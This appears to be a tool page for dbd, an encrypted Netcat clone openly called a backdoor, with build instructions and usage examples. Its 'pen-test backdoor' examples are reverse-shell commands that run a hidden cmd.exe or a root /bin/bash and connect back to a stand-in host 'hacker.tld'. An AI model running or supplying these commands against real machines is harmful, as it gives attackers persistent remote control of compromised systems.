dbd – Durandal’s Backdoor

dbdis a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. dbd supports TCP/IP communication only. Source code and binaries are distributed under the GNU General Public License.COMPILATION :

To compile dbd under a Unix-like operating system you need gcc and relevant development tools. For Linux, FreeBSD, NetBSD, OpenBSD (and possibly others), type:
$ make unix

For SunOS/Solaris, type:
$ make sunos

To compile dbd under Microsoft Windows (NT/2K/XP/2K3) you need MinGW+MSYS, or Cygwin with full development support (Cygwin’s MinGW gcc). To compile a native Win32 dbd console application under Cygwin, type:

$ make win32

or, under MSYS:

$ make mingw

To compile a no-console (“WinMain”) application under Cygwin, type:

$ make win32bg

or, under MSYS:

$ make mingwbg

To compile a Cygwin-specific console application, type:

$ make cygwin

You may want to change the default behaviour of dbd. One of the most important thing is to change the default shared secret to your own pass phrase. Edit dbd.h and replace with your preferences. You may, for example, want to hardcode a host + port to connect to if dbd is started without options. Complete examples are provided in dbd.h.


With a little imagination, dbd can be used for many things…

* Use dbd to securely transfer files between two networks:

snafu$ dbd -l -p 12345 -k secret > output.file

fubar$ cat input.file | dbd -k secret snafu 12345

or from win32:
C:somedir>type input.fil | dbd -k secret snafu 12345

* Use dbd as a simple (but secure) chat:

snafu$ dbd -P snafu -Hon fubar 1234

fubar$ dbd -Pfubar -Hon -l -p 1234

* Use dbd as a pen-test backdoor:

C:hacked box>dbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443

or under Unix-like OSes:

root@owned# ./dbd -r1800 -Don -e /bin/bash hacker.tld 993

Do not pass cached input (a file with commands or similar) to a listening “dbd -e” session. “dbd -e” is using pipes to pass data between the program being executed and dbd. Pipes are used (instead of plain pass-through duplicate file descriptors) because of encryption between the pipes and the socket. In order
to prevent the writing end of one of the pipes from blocking the whole process, I turned it into a non-blocking descriptor. There is a chance that when passing too much input at a time through to the -e program, it will be truncated (cut off) since the pipe buffer (in the OS) can’t hold all of the data. This problem can be solved by making dbd multi-threaded for instance, but I’ll avoid this as long as possible for compatibility reasons.

Download latest version :
Windows : Dbd.zip (232 KB)
Unix/Linux : Dbd.tar.gz (221 KB)
Find other version |
Read more in here : http://gititbit.ch/